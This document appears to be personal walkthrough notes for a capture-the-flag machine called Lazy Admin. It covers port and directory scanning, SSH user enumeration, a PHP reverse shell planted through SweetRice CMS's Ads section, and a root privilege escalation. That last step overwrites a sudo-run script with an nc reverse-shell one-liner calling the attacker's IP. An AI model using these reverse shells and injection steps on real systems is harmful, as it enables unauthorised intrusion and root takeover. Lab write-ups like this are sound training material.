Lazy Admin Machine:
    1-Enumeration:

        nmap -Pn -v -p- <IP> -oN enum/nmap-ports.logs

            IF port == 80:
                gobuster dir -u http://<IP> -r -w /usr/share/wordlists/dirb/common.txt | tee enum/gobuster-p80.log

                or

                python3 dirsearch.py -u http://<IP> -e php, http, xml, js -x 400,401,403


                nikto -h http://<IP> | tee enum/nikto-Web80.log

        ------------------------------------------------------

        nmap -Pn -v -sVC --top-ports 50 --open <IP> -oN enum/nmap-top50.logs

            Document Ports/Services Versions

        ------------------------------------------------------

        We get:
            PORT   STATE SERVICE VERSION
            22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
            | ssh-hostkey: 
            |   2048 49:7c:f7:41:10:43:73:da:2c:e6:38:95:86:f8:e0:f0 (RSA)
            |   256 2f:d7:c4:4c:e8:1b:5a:90:44:df:c0:63:8c:72:ae:55 (ECDSA)
            |_  256 61:84:62:27:c6:c3:29:17:dd:27:45:9e:29:cb:90:5e (ED25519)
            80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
            | http-methods: 
            |_  Supported Methods: GET HEAD POST OPTIONS
            |_http-server-header: Apache/2.4.18 (Ubuntu)
            |_http-title: Apache2 Ubuntu Default Page: It works
            Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kerne

            2.4.18 ((Ubuntu))
            http://10.10.59.124/content/
            SweetRice

        Port 80 give us nothing interisting

        Port 22 OpenSSH 7.2p2 COuld be Enumerate To discover the User Name:
            https://github.com/sodomak/sshenum <-- We get the python script:
                python3 sshenum.py rhost10.10.59.124:22 -w wordlist.txt
                    100%guest 3.589700000000695e-05
                        www-data 3.6287999999995435e-05
                        host 3.808200000000872e-05
                        administrator 3.849200000000108e-05
                        user 3.879199999999583e-05
                        root 4.7278999999997295e-05
                        toor 5.784899999999871e-05
                        admin 0.0011514489999999988

                We may consider this legit result or not but let’s store it for awhile, it may help us along the way.

        We will insiste on port 80 by using dirsearch.py:
            python3 dirsearch.py -u http://10.10.59.124/content/ -t 100 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt 12 7 x

            We found 'inc/mysql_backup'

            We upload the file and find the HASH 

            We also find the /as path that open the 'manager' login

    2- Exploit Manager Dashboard:
        we go to the Ads section of SweetRice Cms and insert a malicious php code for a remote shell
        We inject the remote shell and we open a Listener on our machine:
            nc -lvnp 443 <-- 443 Allowed by Fw

        Now we have a remote shell but in limitied access www-data 

        2-B We will enumerate:

            cat backup.pl
            #!/usr/bin/perl

            system("sh", "/etc/copy.sh");

            /var/backups


            sudo -l
            cat /etc/copy.sh
            rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.190 5554 >/tmp/f


        2-C Exploit:

            The Enumeration showed us  atemporary file that let us Override to get a root shell:

                echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <Kali IP> 443 >/tmp/f" > /etc/copy.sh

                sudo /usr/bin/perl /home/itguy/backup.pl